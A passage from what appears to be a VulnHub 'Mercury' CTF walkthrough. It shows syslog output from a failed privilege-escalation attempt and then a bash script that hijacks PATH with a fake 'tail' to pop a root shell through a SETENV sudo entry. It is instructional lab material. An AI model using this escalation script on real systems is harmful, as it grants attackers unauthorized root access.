Nov 27 05:40:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:45:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:45:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:50:08 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:50:08 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
linuxmaster@mercury:/tmp$
But escalation did not succeed: the real tail ran, so the script never picked up /tmp/tail. Before retrying, two checks are worth making in the shell that runs sudo: `ls -l /usr/bin/vim`, because a symlink whose target does not exist (e.g. if only vim.tiny rather than /usr/bin/vim is installed) is not executable and the shell's PATH search silently skips it, and `command -v tail` after the export, which must print /tmp/tail.
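As an added example (not from the original post), the same PATH hijack with a small wrapper script as the fake tail instead of a symlink to an editor, plus a pre-flight check that the shell would really resolve `tail` to it before sudo is invoked. Function names are mine; it assumes bash, a writable directory such as /tmp, and the sudoers entry shown by `sudo -l` above.

```bash
#!/bin/bash
# Added example, not from the original post: PATH hijack of the unqualified
# `tail` in /usr/bin/check_syslog.sh, with a check that the fake tail is what
# bash will execute. Assumes bash, a writable directory and the sudoers entry
#   (root : root) SETENV: /usr/bin/check_syslog.sh

# Write an executable fake `tail` into $1. A script rather than a symlink:
# a symlink whose target is missing is not executable, and bash's PATH search
# silently skips it, so the real /usr/bin/tail would run instead.
make_fake_tail() {
    dir="$1"
    printf '#!/bin/bash\nexec /bin/bash\n' > "$dir/tail"
    chmod 755 "$dir/tail"
}

# Print the path the shell would execute for `tail` with $1 first in PATH.
resolve_tail() {
    ( PATH="$1:$PATH"; command -v tail )
}

# Succeeds only if our fake tail is the one that will actually run.
hijack_ready() {
    [ "$(resolve_tail "$1")" = "$1/tail" ] && [ -x "$1/tail" ]
}

# The escalation itself: SETENV lets --preserve-env=PATH carry our PATH into
# the root context that runs the script, whose `tail -n 10 /var/log/syslog`
# then resolves to $dir/tail (the fake tail ignores those arguments).
run_hijack() {
    dir="$1"
    hijack_ready "$dir" || { echo "fake tail would not be picked up, fix that first" >&2; return 1; }
    export PATH="$dir:$PATH"
    sudo --preserve-env=PATH /usr/bin/check_syslog.sh
}

# Usage on the box (not executed automatically):
#   make_fake_tail /tmp && run_hijack /tmp
```

The pre-flight check is the part that would have caught the failed attempt above: `hijack_ready` reports the dangling-symlink case as not ready instead of letting sudo run the real tail.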
Tags: Mercury, mercury, 192.168, x20, Vulnhub, Planets, SF, 56.226, webmaster
Source: https://www.cnblogs.com/jason-huawen/p/16929576.html